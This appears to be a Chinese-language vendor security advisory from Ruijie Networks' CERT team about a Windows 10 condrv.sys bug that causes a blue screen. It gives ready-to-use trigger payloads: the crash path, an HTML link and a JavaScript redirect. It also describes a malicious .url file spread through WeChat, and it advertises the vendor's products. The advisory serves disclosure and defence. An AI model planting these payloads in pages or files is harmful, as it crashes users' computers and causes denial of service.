發布時間:2021-01-25
近日,銳捷網絡CERT安全應急響應團隊追蹤到一則Windows 10 condrv.sys存在內存損壞漏洞的信息,該漏洞直接導致Win10系統藍屏。該漏洞是由于Windows 10中condrv驅動設置錯誤導致的。 當Chrome 或Edge瀏覽器在打開特定鏈接時,剛好調用了該驅動的相應函數,而IE沒有調用,因此IE不會受影響。另外,攻擊者能夠直接構造惡意代碼直接調用存在漏洞的函數,如果用戶點擊就會觸發漏洞、導致藍屏。
利用形式
訪問鏈接\\.\globalroot\device\condrv\kernelconnect會觸發藍屏。
觸發方法
用瀏覽器訪問:
file://\\.\globalroot\device\condrv\kernelconnect
用一個快捷方式指向:
\\.\globalroot\device\condrv\kernelconnect
網頁攻擊:
例如a標簽
<a href="file://\\.\globalroot\device\condrv\kernelconnect"></a>
<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>
以及JavaScript腳本。
微信群惡意用戶傳播名為test.url文件,在微信開啟自動下載功能后文件被接收導致電腦即藍屏
訪問該文件夾即藍屏(url文件會自動請求文件圖標而加載\\.\gxxx
點擊打開即藍屏,文件內默認URL為\\.\gxxx
電腦微信打開即藍屏,電腦微信默認使用了微信當前目錄下wechatweb.exe文件對Web內容進行加載,而該exe核心則是由QQ瀏覽器演變而來,而QQ瀏覽器內核又是采用的chrome內核,所以微信端打開即藍屏
影響范圍
目前受影響的操作系統版本:Windows 10.1709及以上系統
處理方案
官方修復建議
該漏洞當前暫無官方解決方案。
產品當前官方暫未發布受影響版本的對應補丁,建議受影響的用戶及時關注更新官方的安全補丁(及時更新升級到最新版本)。鏈接如下:
https://www.microsoft.com/zh-cn/software-download/windows10
銳捷網絡修復建議
|
產品 |
說明 |
|
RG-WALL系列下一代防火墻 |
下一代防火墻結合防病毒以及威脅情報檢測。在安全能力上,不僅支持NAT、ACL、DDoS防御等傳統安全功能,也支持豐富的應用級安全功能,包括病毒查殺、入侵檢測、APP檢測、文件過濾、惡意URL過濾等。提供多維度的應用層監控與分析,幫助用戶掌握風險,精準預警。 |
|
RG-IDP系列入侵檢測防御系統 |
是銳捷網絡推出的將深度內容檢測、安全防護、上網行為管理等技術結合的入侵檢測防御系統設備。通過對網絡中深層攻擊行為進行準確的分析判斷,主動有效的保護網絡安全。配合實時更新的入侵攻擊特征庫,可檢測防護3500種以上的網絡攻擊行為,包含DoS/DDoS、病毒、蠕蟲、僵尸網絡、木馬、可疑代碼、探測與掃描等各種網絡威脅。 |
安全建議
不要打開陌生網頁,如果不必要建議禁止JavaScript。
不要打開陌生程序,終端安裝防護軟件。
不要隨意下載安裝來源不明的軟件,防止有人惡意利用此漏洞造成拒絕服務攻擊。
對不明來歷的郵件、office等提高警惕。
警惕不明來歷壓縮文件,為了讓受害者下載Windows快捷方式(.url)文件。攻擊者會通過欺騙用戶下載ZIP歸檔文件,并將惡意字符串隱藏其中;當用戶解壓ZIP文件時便會觸發攻擊。
及時備份重要文件,以免文件丟失。
團隊介紹
銳捷網絡CERT安全應急響應團隊,跟蹤最新互聯網威脅事件,針對最新安全漏洞,APT攻擊以及僵尸網絡家族做實時跟蹤和分析;為產品、客戶提供實時、有效的安全防護策略與解決方案。
銳捷“網絡+安全”主張將網絡設備的安全能力充分發揮,網絡設備、安全設備與安全平臺智能聯動,告別安全孤島,構成整網聯動的安全保障體系,實現防護、安全預測、分析和響應等安全問題自動化全流程閉環。
如您需要銳捷安全,請留下您的聯系方式
文檔評價
